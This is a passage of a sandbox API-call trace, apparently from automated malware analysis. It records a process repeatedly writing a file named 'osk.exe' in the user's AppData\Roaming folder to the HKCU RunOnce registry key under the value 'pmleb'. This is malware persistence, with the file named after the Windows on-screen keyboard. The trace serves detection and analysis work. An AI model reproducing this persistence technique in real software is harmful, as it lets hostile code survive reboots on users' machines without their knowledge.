[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.405] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.405] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.405] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.406] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.406] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.406] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.406] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0092.406] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.406] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x80 [0092.406] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.407] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7f [0092.407] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.407] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.407] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.407] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.407] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.408] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.408] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.408] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.408] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.408] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.408] RegCloseKey (hKey=0x280) returned 0x0 [0092.408] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.408] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.408] SetTimer (hWnd=0x20280, nIDEvent=0x21fb, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fb [0092.409] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.420] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.420] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.420] KillTimer (hWnd=0x20280, uIDEvent=0x21fb) returned 1 [0092.421] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.421] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.421] IUnknown:Release (This=0x787518) returned 0x1 [0092.421] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.421] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.421] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.422] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.422] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.422] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0092.422] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.422] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x81 [0092.422] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.423] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x80 [0092.423] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.423] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.423] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.423] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.423] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.423] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.424] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.424] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.424] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.424] RegCloseKey (hKey=0x280) returned 0x0 [0092.424] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.424] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.424] SetTimer (hWnd=0x20280, nIDEvent=0x21fc, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fc [0092.424] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.435] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.435] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.436] KillTimer (hWnd=0x20280, uIDEvent=0x21fc) returned 1 [0092.436] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.436] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.436] IUnknown:Release (This=0x787518) returned 0x1 [0092.436] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.436] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.437] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.437] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.437] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0092.437] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.437] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x82 [0092.437] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.438] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x81 [0092.438] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f0c0 | out: ppv=0x33f0c0*=0x787518) returned 0x0 [0092.448] IUnknown:Release (This=0x787518) returned 0x1 [0092.448] GetTickCount () returned 0x114bb35 [0092.448] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.448] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.448] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.448] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.448] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.448] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.448] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.449] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.449] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.449] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.449] RegCloseKey (hKey=0x280) returned 0x0 [0092.449] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.449] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.449] SetTimer (hWnd=0x20280, nIDEvent=0x21fd, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fd [0092.449] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.451] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.451] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.451] KillTimer (hWnd=0x20280, uIDEvent=0x21fd) returned 1 [0092.451] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.453] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.453] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.453] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.453] RegCloseKey (hKey=0x280) returned 0x0 [0092.453] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.453] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.453] SetTimer (hWnd=0x20280, nIDEvent=0x21fe, uElapse=0xa, lpTimerFunc=0x0) returned 0x21fe [0092.453] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.467] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.467] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.467] KillTimer (hWnd=0x20280, uIDEvent=0x21fe) returned 1 [0092.467] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.468] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.468] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.468] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.468] RegCloseKey (hKey=0x280) returned 0x0 [0092.468] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.468] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.468] SetTimer (hWnd=0x20280, nIDEvent=0x21ff, uElapse=0xa, lpTimerFunc=0x0) returned 